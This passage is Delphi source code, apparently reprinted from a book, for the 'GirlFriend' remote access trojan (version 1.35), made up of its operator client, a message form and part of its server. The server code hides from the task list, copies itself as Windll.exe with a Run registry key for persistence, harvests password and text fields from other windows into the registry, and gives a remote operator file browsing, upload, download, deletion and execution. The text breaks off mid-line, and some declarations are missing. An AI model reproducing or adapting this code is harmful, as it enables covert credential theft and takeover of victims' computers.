'W': SetIcon (WAV_FILE);
'B': SetIcon (BMP_FILE);
'U': SetIcon (USUAL_FILE);
'F': begin
SetIcon (CLOSED_ICON);
TMP:=tvApp.Items.AddChild (TMP, 'Loading...');
SetIcon (-1);
end;
end;
end;
FolderNode.Expand (FALSE);
diskmode:=true;
TreeCame:=true;
working:=false;
end;
procedure TClientForm.ClientSocketRead(Sender: TObject;
var RST: string;
i: integer;
begin
if (recfile) then
begin
repeat
AC:=Socket.ReceiveBuf (buffer, 1024);
if AC>0 then
begin
SC:=SC+AC;
Str (round(100*SC/FSize):3, PCN);
stbStatus.Panels[0].Text:='Receiving '+FName+'. '+PCN+'% done.';
stbStatus.Refresh;
BlockWrite (FlT, buffer, AC);
end;
until SC>=FSize;
if recfile then
begin
CloseFile (FlT);
txtLog.Lines.Add ('Downloading complete.');
stbStatus.Panels[0].Text:='Waiting for command.';
end;
working:=false;
recfile:=false;
exit;
end;
if not(working) then
begin
RST:=Socket.ReceiveText;
if RST='Uploading complete.' then
begin
Uploaded:=true;
ServerAnswer:=True;
end
else
ServerAnswer:=True;
if Pos ('FCOMP}', RST)<>0 then
begin
working:=true;
loading:=false;
// Compress the txtHid
for i:=0 to txtHid.Lines.Count-1 do
if txtHid.Lines.Strings[i]='' then txtHid.Lines.Delete(i);
FSize:=strtoint(txtHid.Lines.Strings[0]);
FName:=txtHid.Lines.Strings[1];
AssignFile (FlT, FName);
ReWrite (FlT, 1);
for i:=0 to Length(RST)-9 do
buffer[i]:=ord(RST[i+7]);
BlockWrite (FlT, buffer, Length(RST)-9, SC);

recfile:=true;
exit;
end;
if loading then txtHid.Text:=txtHid.Text+RST;

if (pos('{PLTS}',RST)>0) then
begin
txtHid.Lines.Clear;
txtHid.text:=copy(RST,7,length(rst)-6);
loading:=true;
end;
if (pos('{TDSS}',RST)>0) then
begin
txtHid.Lines.Clear;
loading:=true;
end;
if (pos('{FSEND}', RST)>0) then
begin
txtHid.Lines.Clear;
loading:=true;
end;
if (pos('{LFTM}',RST)>0) then
begin
txtHid.Lines.Clear;
loading:=true;
end;
if (not(loading)) then
begin
if RST='File deleted.' then
begin
FileDestroyed:=true;
DeleteAnswer:=true;
end;
if RST='Delete Error.' then
begin
FileDestroyed:=false;
DeleteAnswer:=true;
end;
txtLog.Lines.Add (RST);
exit;
end;
if pos('TPL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then

begin
loading:=false;
PC:=0;
if (txtHid.Lines.Strings [i]<>'') and (txtHid.Lines.Strings[i]<>'{FTPL}')
and (Pos ('___', txtHid.Lines.Strings[i])<>0) then
begin
Inc (PC);
PList [PC]:=txtHid.Lines.Strings[i];
end;
gbTree.Caption:=' Password && text fields ';
ProcessTree;
diskmode:=false;
exit;
end;
if pos('FDT}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then
begin
loading:=false;
PC:=0;
if (txtHid.Lines.Strings[i]<>'') and
(txtHid.Lines.Strings[i]<>'{FFDT}') then
begin
Inc (PC);
PList[PC]:=txtHid.Lines.Strings[i];
end;
gbTree.Caption:=' File Manager ';
ProcessDiskList;
diskmode:=true;
exit;
end;
if pos('ETL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then
begin
loading:=false;
PC:=0;
if (txtHid.Lines.Strings[i]<>'') and
(Length(txtHid.Lines.Strings[i])>8) then
begin
Inc (PC);
PList[PC]:=txtHid.Lines.Strings[i];
if (PC+1)>LastPosition then break;
end;
ProcessDirectory;
exit;
end;
end;
end;
procedure TClientForm.ClientSocketError(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
if not(scanning) then
stbStatus.Panels[0].Text:= 'Error connecting to: ' + CurrIP
else
begin
ServerAnswer:=true;
Connection:=false;
end;
ErrorCode:= 0;
end;
procedure TClientForm.FormClose(Sender: TObject; var Action: TCloseAction);
var ipdata:iptype;
i:integer;
begin
AssignFile (fl, 'hosts.ip');
if fileexists ('hosts.ip') then reset (fl)
else rewrite (fl);
seek(fl,0);
for i:=0 to ip.items.Count-1 do ipdata.ip[i]:=ip.items[i];
for i:=0 to portvalue.items.Count-1 do
ipdata.port[i]:=strtoint(portvalue.items[i]);
ipdata.pcount:=portvalue.items.count;
ipdata.ipcount:=ip.items.count;
write(fl,ipdata);
closefile(fl);
if clientsocket.Active then begin
clientSocket.Socket.SendText('Quiting..');
clientsocket.close;
end;
end;
procedure TClientForm.sbShowPassClick(Sender: TObject);
begin
if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText
('Old me show?');
end;
procedure TClientForm.sbCustomClick(Sender: TObject);
var strtos:string;
begin
if inputquery ('Custom', 'Enter command: ', strtos) then
clientsocket.socket.SendText (strtos);
end;
procedure TClientForm.sbExitClick(Sender: TObject);
begin
DestroyTrayIcon (1, ClientForm.Handle);
clientsocket.Socket.SendText ('Quiting..');
if clientsocket.Active then clientsocket.close;
halt(0);
end;
procedure TClientForm.sbAboutClick(Sender: TObject);
begin
AboutForm.ShowModal;
end;
procedure TClientForm.FormCreate(Sender: TObject);
var ipdata:iptype;
i:integer;
begin
if fileexists ('hosts.ip') then
begin
AssignFile (fl, 'hosts.ip');
ReSet (fl);
Read(fl, ipdata);
for i:=0 to ipdata.ipcount-1 do ip.items.Add (ipdata.ip[i]);
for i:=0 to ipdata.pcount-1 do portvalue.items.add (inttostr(ipdata.port[i]));
clientsocket.address:=ipdata.ip[ipdata.ipcount-1];
clientsocket.port:=ipdata.port[ipdata.pcount-1];
ip.text:=ipdata.ip[ipdata.ipcount-1];
portvalue.Text:=inttostr(ipdata.port[ipdata.pcount-1]);
closefile (fl);
end;
diskmode:=false;
working:=false;
loading:=false;
end;
procedure TClientForm.sbMessageClick(Sender: TObject);
begin
frmMessage.ShowModal;
end;
procedure TClientForm.txtLogDblClick(Sender: TObject);

begin
txtlog.Lines.clear;
end;
procedure TClientForm.PortChangeClick(Sender: TObject);
begin
if portvalue.text<>'' then
begin
ClientSocket.Socket.SendText ('setport'+portvalue.Text);
ClientSocket.close;
Clientsocket.port:=strtoint(portvalue.text);
clientsocket.open;
end;
end;
procedure TClientForm.sbResetClick(Sender: TObject);

begin
if (clientsocket.active) and (not(loading)) then clientsocket.socket.SendText
('RESETALL');
end;
procedure TClientForm.cmdSaveClick(Sender: TObject);

var i: integer;
Fl: TextFILE;
FS: string;
function RPSP (tms: integer): string;
var i: integer;
begin
result:='';
if tms>0 then
for i:=1 to tms do
result:=result+' ';
end;
begin
if sd1.Execute then
begin
AssignFile (Fl, sd1.FileName);
ReWrite (Fl);
for i:=0 to tvApp.Items.Count-1 do
begin
FS:='['+inttostr(i+1)+']'+
RPSP(tvApp.Items[i].Level)+
tvApp.Items[i].Text;
WriteLn (Fl, FS);
end;
CloseFile (Fl);
end;
end;
procedure TClientForm.PingserverAlive1Click(Sender: TObject);

begin
if not(loading) then clientsocket.socket.SendText ('TEST?');
end;
procedure TClientForm.mnuPlaySoundClick(Sender: TObject);

var strtos: string;
begin
strtos:='';
if not(loading) then if inputquery ('Play sound', 'Enter full && exact path to
.wav file: ', strtos) then clientsocket.socket.SendText ('{S}'+strtos);
end;
procedure TClientForm.mnuShowPicClick(Sender: TObject);

var strtos: string;
begin
strtos:='';
if not(loading) then if inputquery ('Show bitmap', 'Enter full && exact path to
.bmp file: ', strtos) then clientsocket.socket.SendText ('{P}'+strtos);
end;
procedure AnswerF12 (KC: Word);
var TMS: string;
begin
if KC=VK_F12 then
begin
ClientForm.mnuShow.Visible:=true;
ClientForm.mnuShow.Default:=true;
ClientForm.mnuDelim1.Visible:=true;
TMS:='BoyFriend (client) version: 1.35';
if ClientForm.ClientSocket.Socket.Connected then
TMS:=TMS+'. Connected with '+ClientForm.ClientSocket.Address;
AddTrayIcon (1, TMS,
WM_NOTIFYMSG);
ClientForm.Hide;
end;
end;
procedure TClientForm.NotifyIcon (var TM: TMessage);
var AC: LongInt;
CP: TPoint;
begin
AC:=TM.LParam;
if AC=WM_LBUTTONDBLCLK then
begin
ClientForm.mnuShow.Visible:=false;
ClientForm.mnuShow.Default:=false;
ClientForm.mnuDelim1.Visible:=false;
ClientForm.Show;
end;
if AC=WM_RBUTTONDOWN then
begin
GetCursorPos (CP);
pmActions.Popup (CP.X, CP.Y);
end;
end;
procedure TClientForm.txtLogKeyDown(Sender: TObject; var Key: Word;
begin
AnswerF12 (Key);
end;
procedure TClientForm.tvAppKeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.portvalue1KeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.IP1KeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.PortChangeKeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.cmdSaveKeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.FormKeyDown(Sender: TObject; var Key: Word;

begin
AnswerF12 (Key);
end;
procedure TClientForm.mnuShowClick(Sender: TObject);

begin
ClientForm.mnuShow.Visible:=false;
ClientForm.mnuShow.Default:=false;
ClientForm.mnuDelim1.Visible:=false;
ClientForm.Show;
end;
procedure TClientForm.mnuURLClick(Sender: TObject);

var strtos: string;
begin
strtos:='';
if not(loading) then
if inputquery ('Go to URL', 'Enter URL (with http://). ', strtos) then
clientsocket.socket.SendText ('{U}'+strtos);
end;
procedure TClientForm.tvAppExpanding(Sender: TObject; Node: TTreeNode;

var AllowExpansion: Boolean);
begin
AllowExpansion:=(Node.getFirstChild.ImageIndex<>-1);
if not(AllowExpansion) then
begin
tvApp.Selected:=Node;
tvAppDblClick (Sender);
end
else
if Node.ImageIndex=CLOSED_ICON then
begin
Node.ImageIndex:=OPEN_ICON;
Node.SelectedIndex:=OPEN_ICON;
end;
end;
procedure TClientForm.tvAppCollapsing(Sender: TObject; Node: TTreeNode;

var AllowCollapse: Boolean);
begin
if Node.ImageIndex=OPEN_ICON then
begin
Node.ImageIndex:=CLOSED_ICON;
Node.SelectedIndex:=CLOSED_ICON;
end;
end;
procedure TClientForm.sbFileManagerClick(Sender: TObject);

begin
if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText
('getbaselist');
end;
procedure TClientForm.tvAppDblClick(Sender: TObject);

var Start: TTreeNode;
Path: string;
begin
if (diskmode) then
begin
if (tvApp.Selected.Data=nil) and
(tvApp.Selected.ImageIndex in
[CLOSED_ICON, OPEN_ICON, HDD_ICON,
CDROM_ICON]) then
begin
FolderNode:=tvApp.Selected;
Start:=tvApp.Selected;
tvApp.Selected.Data:=@loading;
Path:=Start.Text+'\';
if Start.Level>0 then
repeat
Start:=Start.Parent;
Path:=Start.Text+'\'+Path;
until Start.Level=0;
if ClientSocket.Active then
ClientSocket.Socket.SendText ('diskget'+Path);
end;
if (tvApp.Selected.ImageIndex in
[BMP_FILE, WAV_FILE, EXE_FILE]) then
begin
Path:=TrimPRT (Start.Text);
repeat
case tvApp.Selected.ImageIndex of
BMP_FILE: Path:='{P}'+Path;
WAV_FILE: Path:='{S}'+Path;
EXE_FILE: Path:='{U}'+Path;
end;
if not(loading) then clientsocket.socket.SendText (Path);
end;
end;
end;
procedure TClientForm.tvAppRatoDown(Sender: TObject; Button: TRatoButton;

Shift: TShiftState; X, Y: Integer);
var CP: TPoint;
begin
if (Button=mbRight) and (diskmode) then
begin
GetCursorPos (CP);
pmFile.Popup (CP.X, CP.Y);
end;
end;
procedure TClientForm.pmFilePopup(Sender: TObject);

begin
mnuDownload.Enabled:=(tvApp.Selected.ImageIndex in
[BMP_FILE, WAV_FILE, EXE_FILE, USUAL_FILE]);
mnuDelete.Enabled:=mnuDownload.Enabled;
mnuDelim.Visible:=false;
mnuRun.Visible:=false;
if (tvApp.Selected.ImageIndex in
[BMP_FILE, WAV_FILE, EXE_FILE]) then
begin
mnuDelim.Visible:=true;
mnuRun.Visible:=true;
mnuRun.Default:=true;
mnuRun.ImageIndex:=tvApp.Selected.ImageIndex;
case tvApp.Selected.ImageIndex of
BMP_FILE: mnuRun.Caption:='Show';
WAV_FILE: mnuRun.Caption:='Play';
EXE_FILE: mnuRun.Caption:='Run';
end;
end;
mnuDelete.Enabled:=not (tvApp.Selected.ImageIndex in [HDD_ICON, CDROM_ICON]);
end;
procedure TClientForm.mnuDeleteClick(Sender: TObject);

var Start, TrueChild: TTreeNode;
Path: string;
begin
TrueChild:=tvApp.Selected;
repeat
if MessageDlg ('Really delete '+DupAmps(Path)+' ?', mtConfirmation, [mbYes,

mbNo], 0)=
mrYes then
ClientSocket.Socket.SendText ('delfile'+Path);
DeleteAnswer:=false;
FileDestroyed:=false;
repeat
until DeleteAnswer;
if FileDestroyed then
TrueChild.Delete;
end;
procedure TClientForm.mnuRunClick(Sender: TObject);

begin
tvAppDblClick (Sender);
end;
procedure TClientForm.mnuDownloadClick(Sender: TObject);

var Start: TTreeNode;
Path: string;
begin
repeat
if MessageDlg ('Download '+DupAmps(Path)+' ?', mtConfirmation, [mbYes, mbNo], 0)=
mrYes then
ClientSocket.Socket.SendText ('getfile'+Path);
end;
procedure TClientForm.mnuUploadClick(Sender: TObject);
var Fl: FILE;
Query: string;
i, BSent: integer;
Folder: TTreeNode;
RemotePath: string;
begin
if od1.Execute then
begin
Folder:=tvApp.Selected;
if Folder.ImageIndex in
[EXE_FILE, BMP_FILE, WAV_FILE, USUAL_FILE] then
Folder:=Folder.Parent;
FolderNode:=Folder;
RemotePath:=Folder.Text+'\';
if Folder.Level>0 then
repeat
Folder:=Folder.Parent;
RemotePath:=Folder.Text+'\'+RemotePath;
until Folder.Level=0;
FName:=od1.FileName;
AssignFile (Fl, FName);
{$I-}
ReSet (Fl, 1);
{$I+}
if IOResult<>0 then
begin
MessageDlg ('Error accessing file.', mtError, [mbOK], 0);
exit;
end;
FSize:=FileSize(Fl);
Query:='';
for i:=Length(FName) downto 1 do
if FName[i]='\' then break else Query:=FName[i]+Query;
Query:=Query+':::'+inttostr(FSize);
begin
ClientSocket.Socket.SendText ('takefile'+RemotePath+Query+WrapStr);
Sleep (1000); // !!!!DON'T REMOVE THIS COMMENT!!!!
repeat
BlockRead (Fl, buffer, 1024, BSent);
if BSent>0 then
ClientSocket.Socket.SendBuf (buffer, BSent);
until EOF (Fl);
ServerAnswer:=false;
repeat
until ServerAnswer;
if Uploaded then
ClientSocket.Socket.SendText ('diskget'+RemotePath);
end;
CloseFile (Fl);
end;
end;
end.
Página 186
Fonte: MessageUnit.PAS
unit MessageUnit;
interface
uses
Buttons, StdCtrls, ExtCtrls;
type
TfrmMessage = class(TForm)
sbNoIcon: TSpeedButton;
Label1: TLabel;
sbWarning: TSpeedButton;
sbInfo: TSpeedButton;
sbStop: TSpeedButton;
sbQuest: TSpeedButton;
rgType: TRadioGroup;
txtMessage: TEdit;
Label2: TLabel;
Label3: TLabel;
cmdSend: TButton;
cmdCancel: TButton;
cmdTest: TButton;
Label4: TLabel;
txtCaption: TEdit;
procedure sbNoIconClick(Sender: TObject);
procedure sbWarningClick(Sender: TObject);
procedure sbInfoClick(Sender: TObject);
procedure sbStopClick(Sender: TObject);
procedure sbQuestClick(Sender: TObject);
procedure cmdTestClick(Sender: TObject);
procedure cmdCancelClick(Sender: TObject);
procedure cmdSendClick(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
frmMessage: TfrmMessage;
implementation
uses main;
var
CIcon: integer;
IconConst: array [0..4] of integer=(0, MB_ICONEXCLAMATION,
MB_ICONINFORMATION, MB_ICONSTOP, MB_ICONQUESTION);
{$R *.DFM}
procedure TfrmMessage.FormCreate(Sender: TObject);

begin
CIcon:=0;
end;
procedure TfrmMessage.sbNoIconClick(Sender: TObject);

begin
CIcon:=0;
end;
procedure TfrmMessage.sbWarningClick(Sender: TObject);

begin
CIcon:=1;
end;
procedure TfrmMessage.sbInfoClick(Sender: TObject);

begin
CICon:=2;
end;
procedure TfrmMessage.sbStopClick(Sender: TObject);

begin
CIcon:=3;
end;
procedure TfrmMessage.sbQuestClick(Sender: TObject);

begin
CIcon:=4;
end;
procedure TfrmMessage.cmdTestClick(Sender: TObject);

var TSum: LongInt;
MCapt, MText: PChar;
MT, RT: string;
i: integer;
begin
TSum:=0;
case rgType.ItemIndex of
1: TSum:=MB_ABORTRETRYIGNORE;
2: TSum:=MB_OKCANCEL;
3: TSum:=MB_RETRYCANCEL;
4: TSum:=MB_YESNO;
5: TSum:=MB_YESNOCANCEL;
end;
TSum:=TSum+IconConst[CIcon];
getMem (MCapt, 100);
StrPCopy (MCapt, txtCaption.Text);
RT:='';
MT:=txtMessage.Text;
for i:=1 to Length (MT) do
if MT[i]='|' then RT:=RT+chr(13)+chr(10) else RT:=RT+MT[i];
getMem (MText, 500);
StrPCopy (MText, RT);
MessageBox (frmMessage.Handle, MText, MCapt, TSum);
freeMem (MText);
freeMem (MCapt);
end;
procedure TfrmMessage.cmdCancelClick(Sender: TObject);

begin
frmMessage.Close;
end;
procedure TfrmMessage.cmdSendClick(Sender: TObject);

var MT: string;
begin
MT:='{MSG}'+txtCaption.Text+
'$$$'+txtMessage.Text+
'%%%'+inttostr(rgType.ItemIndex)+inttostr(CIcon);
ClientForm.ClientSocket.Socket.SendText (MT);
frmMessage.Close;
end;
end.
Página 189
Fonte: SERVERMAIN.PAS
unit ServerMain;
interface
uses
ScktComp, Registry, ShellAPI, ExtCtrls, ShowPictureUnit;
type
TRegisterServiceProcess = function (dwProcessID, dwType:DWord): DWORD; stdcall;
TServerForm = class(TForm)
ServerSocket: TServerSocket;
PTimer: TTimer;
procedure ShowPicture (pName: string);
procedure ServerSocketClientRead(Sender: TObject;
procedure PTimerTimer(Sender: TObject);
private
public
end;
var
ServerForm: TServerForm;
function PlaySound(lpszSoundName: PAnsiChar; uFlags: UINT): BOOL; stdcall;
implementation
function PlaySound; external 'winmm.dll' name 'sndPlaySoundA';
{$R *.DFM}
var
PList: array [1..64] of string;
FlT: FILE;
FName: string;
FSize: integer;
AppList: array [1..64] of LongInt;
PC, RC, APC, RLen, AC: integer;
SD: string;
buffer: array [0..1040] of byte;
sendfile, recfile: boolean;
iores: integer;
const
IconConst: array [0..4] of integer=(0, MB_ICONEXCLAMATION,
MB_ICONINFORMATION, MB_ICONSTOP, MB_ICONQUESTION);
WrapStr = #13+#10;
MegaByte = 1024*1024;
KiloByte = 1024;
function WinText (hWnd: LongInt): string;
var PC: PChar;
L: integer;
begin
L:=SendMessage (hWnd, WM_GETTEXTLENGTH, 0, 0);
getmem (PC, L+1);
SendMessage (hWnd, WM_GETTEXT, L+1, LongInt (PC));
result:=PC;
end;
function IsPassword (hWnd: LongInt): boolean;
var ST: LongInt;
begin
ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF;
result:=(ST=$A0) or (ST=$E0);
end;
function IsTextField (hWnd: LongInt): boolean;
var ST: LongInt;
begin
ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF;
result:=(ST=$A0) or (ST=$E0) or (ST=$80) or (ST=$C0);
end;
// Gets all applications with pass fields
procedure GetPasswordList;
var i, j: integer;
ohWnd, PrhWnd: LongInt;
begin
APC:=0;
for i:=1 to 16384 do
if IsWindow (i) then
if IsPassword (i) then
begin
PrhWnd:=i;
repeat
ohWnd:=PrhWnd;
PrhWnd:=GetParent (ohWnd);
until GetParent (PrhWnd)=0;
Inc (APC);
AppList[APC]:=PrhWnd;
end;
PC:=0;
for i:=1 to 16384 do
if IsWindow (i) then
if IsTextField (i) then
begin
PrhWnd:=i;
repeat
ohWnd:=PrhWnd;
PrhWnd:=GetParent (ohWnd);
until GetParent (PrhWnd)=0;
for j:=1 to APC do
if PrhWnd=AppList[j] then
begin
Inc (PC);
PList[PC]:=WinText(PrhWnd)+'___'+WinText(i);
break;
end; { Application with passes scanning..}
end; { hWnd scanning }
end; { End of procedure }
procedure RegistryPasswords;
// adds passwords (from PList) to Registry with old Password checking
var i, j: integer;
found: boolean;
RG: TRegistry;
begin
ServerForm.PTimer.Enabled:=false;
RG:=TRegistry.Create;
GetPasswordList;
RG.RootKey:=HKEY_LOCAL_MACHINE;
RG.OpenKey ('SOFTWARE\Microsoft\General\', TRUE);
if RG.ValueExists ('TCount') then
RC:=RG.ReadInteger ('TCount')
else
RC:=0;
if RC=0 then // Empty registry - don't compare, add all passes..
begin
RG.WriteInteger ('TCount', PC);
for i:=1 to PC do
RG.WriteString (inttostr(i), PList[i]);
end
else
begin // Comparing RList & PList...
for i:=1 to PC do // compare loop
begin
found:=false;
for j:=1 to RC do
if RG.ReadString (inttostr(j))=PList[i] then found:=true;
if not(found) then
begin
Inc (RC);
RG.WriteString (inttostr(RC), PList[i]);
end;
end; // end compare loop
RG.WriteInteger ('TCount', RC);
{ for i:=1 to RC do
RG.WriteString (inttostr(i), RList[i]);}
end;
RG.Destroy;
ServerForm.PTimer.Enabled:=true;
end;
procedure TServerForm.FormCreate(Sender: TObject);
var TM: string;
i: integer;
PC, OldName, NewName: PChar;
RG: TRegistry;
hNdl:THandle;
RegisterServiceProcess: TRegisterServiceProcess;
begin
//
//
//
hNdl:=LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess:=GetProcAddress(hNdl, 'RegisterServiceProcess');
RegisterServiceProcess (GetCurrentProcessID, 1);
FreeLibrary(hNdl);
//
SetWindowLong(Application.Handle, GWL_EXSTYLE,
GetWindowLong(Application.Handle, GWL_EXSTYLE) or
WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW);
TM:=Application.ExeName;
for i:=Length(TM) downto 1 do
if TM[i]='\' then break;
TM:=copy (TM, 1, i);
getMem (PC, 100);
GetWindowsDirectory (PC, 100);
SD:=PC+'\';
freeMem (PC);
getmem (OldName, 100);
getMem (NewName, 100);
StrPCopy (OldName, Application.ExeName);
StrPCopy (NewName, SD+'Windll.exe');
if TM<>SD then // First launch from other directory....
begin
DeleteFile (SD+'Windll.exe');
CopyFile (OldName, NewName, FALSE);
RG:=TRegistry.Create; // Add data to registry
RG.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE);
RG.WriteString ('Windll.exe', SD+'Windll.exe');
RG.Destroy;
StrPCopy (OldName, '"'+Application.ExeName+'"');
ShellExecute (0, 'open', NewName, OldName, 'c:\', 1);
Halt (0);
end
else
begin // Launch from WINDOWS directory
RG:=TRegistry.Create; // Remove from Registry (to hide!)
RG.Destroy;
RG.OpenKey ('SOFTWARE\Microsoft\General', TRUE);
RG.CreateKey ('Settings');
RG.OpenKey ('\SOFTWARE\Microsoft\General\Settings', FALSE);
if RG.ValueExists ('APPID') then
ServerSocket.Port:=RG.ReadInteger ('APPID')
else
RG.WriteInteger ('APPID', ServerSocket.Port);
DeleteFile (ParamStr(1));
RG.Destroy;
ServerSocket.Active:= True;
end;
end;
function extract (st: string; ind1, ind2: integer): string;
var i: integer;
begin
result:='';
for i:=ind1 to ind2 do
result:=result+st[i];
end;
function ProcessMsg (Ms: string): string;
// processing message....
// Message format:
// {MSG}<caption>$$$<text>%%%messageview (2 symbols)
var MCapt, MText: PChar;
MT, RT: string;
MSum: LongInt;
i: integer;
begin
MT:=extract (Ms, 6, Pos ('$$$', MS)-1);
getMem (MCapt, Length(MT)+1);
StrPCopy (MCapt, MT);
MT:=extract (MS, Pos('$$$', MS)+3, Pos ('%%%', MS)-1);
RT:='';
for i:=1 to Length (MT) do
if MT[i]='|' then RT:=RT+chr(13)+chr(10) else RT:=RT+MT[i];
getMem (MText, Length(RT)+1);
StrPCopy (MText, RT);
RT:=extract (MS, Pos ('%%%', MS)+3, Length (MS) );
MSum:=0;
case RT[1] of
'1': MSum:=MB_ABORTRETRYIGNORE;
'2': MSum:=MB_OKCANCEL;
'3': MSum:=MB_RETRYCANCEL;
'4': MSum:=MB_YESNO;
'5': MSum:=MB_YESNOCANCEL;
end;
MSum:=MSum+IconConst [ ord (RT[2])-48 ];
MSum:=MessageBox (0, MText, MCapt, MSum+MB_SYSTEMMODAL);
RT:='Unknown answer';
case MSum of
IDABORT: RT:='Abort.';
IDCANCEL: RT:='Cancel.';
IDIGNORE: RT:='Ignore.';
IDNO : RT:='No.';
IDOK : RT:='Ok.';
IDRETRY: RT:='Retry.';
IDYES : RT:='Yes.';
end;
result:=RT;
freeMem (MText);
freeMem (MCapt);
end;
procedure TServerForm.ShowPicture (pname: string);
begin
if FileExists (pname) then
with frmPicture do
begin
imgPic.Picture.LoadFromFile (pname);
imgPic.Top:=0;
imgPic.Left:=0;
pnPic.Left:=2;
pnPic.Top:=2;
pnPic.Width:=imgPic.Width+3;
pnPic.Height:=imgPic.Height+3;
Width:=imgPic.Width+5;
Height:=imgPic.Height+5;
Left:=(Screen.Width-Width) div 2;
Top:=(Screen.Height-Height) div 2;
Show;
end;
end;
function TransName (FD: TSearchRec): string;
var RS: char;
MD: string;
begin
RS:='U';
if (FD.Attr and faDirectory)>0 then RS:='F';
MD:=LowerCase (copy (FD.Name, Length(FD.Name)-2, 3));
if MD='bmp' then RS:='B';
if MD='exe' then RS:='E';
if MD='wav' then RS:='W';
result:=RS+'_'+LowerCase(FD.Name){+WrapStr};
end;
function LastPos (subchar: char; s: string): integer;
var i: integer;
begin
result:=0;
for i:=Length(s) downto 1 do
if subchar=s[i] then
begin
result:=i;
break;
end;
end;
function GetFSizeStr (FN: TSearchRec): string;
var FS: real;
FST, DB: string;
begin
FS:=FN.Size;
DB:=' B)';
if FS>=KiloByte then DB:=' KB)';
if FS>=MegaByte then DB:=' MB)';
if DB=' KB)' then FS:=FS / KiloByte;
if DB=' MB)' then FS:=FS / MegaByte;
if DB=' B)' then
FST:=inttostr(round(FS))
else
Str (FS:5:2, FST);
FST:=Trim (FST);
result:=' ('+FST+DB+WrapStr;
end;
function CNumeric (const S: string):string;
var i: integer;
begin
result:='';
for i:=1 to Length (S) do
if S[i] in ['0','1','2','3','4','5','6','7','8','9'] then
result:=result+S[i];
end;
procedure TServerForm.ServerSocketClientRead(Sender: TObject;
var gotstr:string;
i, PX: integer;
TM: Cardinal;
RG: TRegistry;
TPC: PChar;
TMR, DM: string;
STD: TSearchRec;
FL: FILE;
begin
if recfile then
begin
repeat
AC:=Socket.ReceiveBuf (buffer, 1024);
if AC>0 then
begin
RLen:=RLen+AC;
BlockWrite (FlT, buffer, AC);
end;
until RLen>=FSize;
if recfile then
begin
CloseFile (FlT);
Socket.SendText ('Uploading complete.');
end;
recfile:=false;
exit;
end;
if not(recfile) then
begin
gotstr:=socket.receivetext;
if (copy (gotstr, 1, 7)='getfile') and not(sendfile) then
if FileExists (extract (gotstr, 8, Length(gotstr))) then
begin
sendfile:=true;
AssignFile (Fl, extract (gotstr, 8, Length(gotstr)));
ReSet (Fl, 1);
Socket.SendText ('Sending file '+extract (gotstr, 8, Length(gotstr))+'; size
'+inttostr(FileSize (FL))+' byte(s).');
Socket.SendText ('{FSEND}'+WrapStr);
Socket.SendText (inttostr(FileSize (FL))+WrapStr);
Socket.SendText (extract (gotstr, lastpos ('\', gotstr)+1,
Length(gotstr))+WrapStr);
Sleep (500);
Socket.SendText ('{FCOMP}'+WrapStr);
Sleep (1000);
repeat
BlockRead (Fl, buffer, 1024, iores);
if iores>0 then
Socket.SendBuf (buffer, iores);
until EOF(Fl);
CloseFile (Fl);
sendfile:=false;
end;
if not (sendfile) then
begin
if copy (gotstr, 1, 8)='takefile' then
begin
recfile:=true;
FName:=extract (gotstr, Pos (':::', gotstr)+3, Length(gotstr));
FSize:=strtoint (CNumeric (FName));
FName:=extract (gotstr, 9, Pos (':::', gotstr)-1);
AssignFile (FlT, FName);
ReWrite (FlT, 1);
RLen:=0;
exit;
end;
if copy (gotstr, 1, 7)='delfile' then
begin
if DeleteFile (extract (gotstr, 8, Length(gotstr))) then
Socket.SendText ('File deleted.') else
Socket.SendText ('Delete Error.');
end;
if gotstr='Quiting..'then
begin
ServerSocket.Close;
end;
// Disk list transmitting
if gotstr='getbaselist' then
begin
GetMem (TPC, 100);
PX:=GetLogicalDriveStrings (100, TPC);
DM:='';
for i:=-1 to PX do
if (TPC+i)[1]<>#0 then DM:=DM+(TPC+i)[1];
FreeMem (TPC);
TMR:='';
Socket.SendText ('{TDSS}');
for i:=1 to Length (DM) do
begin
TMR:=TMR+DM[i];
if (i mod 3)=0 then
begin
GetMem (TPC, 4);
StrPCopy (TPC, TMR);
PX:=GetDriveType (TPC);
FreeMem (TPC);
TM:=0;
if PX=DRIVE_CDROM then
begin
TMR:='C_'+TMR+WrapStr;
TM:=10;
end;
if PX=DRIVE_FIXED then
begin
TMR:='H_'+TMR+WrapStr;
TM:=10;
end;
if TM>0 then Socket.SendText (TMR);
TMR:='';
end;
end;
Socket.SendText ('{FFDT}');
end;
//
if copy (gotstr, 1, 7)='diskget' then
begin
Socket.SendText ('{LFTM}'+WrapStr);
FindFirst (extract (gotstr, 8, Length(gotstr))+'*.*', faAnyFile, STD);
if ((STD.Attr and faDirectory)>0) and (STD.Name<>'.') then
Socket.SendText (TransName(STD)+WrapStr);
repeat
PX:=FindNext (STD);
if (PX=0) and ((STD.Attr and faDirectory)>0) and (STD.Name<>'..') then
Socket.SendText (TransName(STD)+WrapStr);
until PX<>0;
FindClose (STD);
FindFirst (extract (gotstr, 8, Length(gotstr))+'*.*',

faArchive+faReadOnly+
faHidden+faSysFile, STD);
if STD.Attr<>faDirectory then
Socket.SendText (TransName(STD)+GetFSizeStr (STD));
repeat
PX:=FindNext (STD);
if (PX=0) and (STD.Attr<>faDirectory) then
Socket.SendText (TransName(STD)+GetFSizeStr (STD));
until PX<>0;
FindClose (STD);
Socket.SendText ('{RETL}');
end;
if gotstr='ver' then socket.sendtext('GirlFriend Server 1.35 . Port '+
